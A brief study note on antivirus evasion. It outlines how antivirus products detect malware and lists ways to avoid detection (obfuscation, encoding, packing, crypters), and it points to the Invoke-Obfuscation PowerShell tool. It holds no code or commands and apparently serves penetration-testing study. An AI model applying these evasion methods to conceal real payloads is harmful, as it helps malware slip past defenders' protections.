AV Evasion Techniques

AV Detection Methods

AV software will typically utilize signature, heuristic and behaviour based detection.

  1. Signature based detection - An AV signature is a unique sequence of bytes that uniquely identifies malware. As a result, you will have to ensure that your obfuscated exploit or payload doesn't match any known signature in the AV database. We can bypass signature-based detection by modifying the malware's byte sequence, therefore changing the signature.
  2. Heuristic-based detection - Relies on rules or decisions to determine whether a binary is malicious. It also looks for specific patterns within the code or program calls.
  3. Behavior based detection - Relies on identifying malware by monitoring it’s behavior. (Used for newer strains of malware)

On-disk Evasion Techniques

1. Obfuscation:

Obfuscation refers to the process of concealing something important, valuable or critical. Obfuscation reorganizes code in order to make it harder to analyze or RE.

2. Encoding:

Encoding data is a process involving changing data into a new format using a scheme. Encoding is a reversible process; data can be encoded to a new format and decoded to its original format.

3. Packing:

Generate executable with new binary structure with a smaller size and therefore provides the payload with a new signature.

4. Crypters:

Encrypts code or payloads and decrypts the encrypted code in memory. The decryption key/function is usually stored in a stub.

In-Memory Evasion Techniques:

Obfuscation

Invoke-Obfuscation

Invoke-Obfuscation is an open source PowerShell v2.0+ compatible PowerShell command and script obfuscator.

GitHub Repo :LiGithub: https://github.com/danielbohannon/Invoke-Obfuscation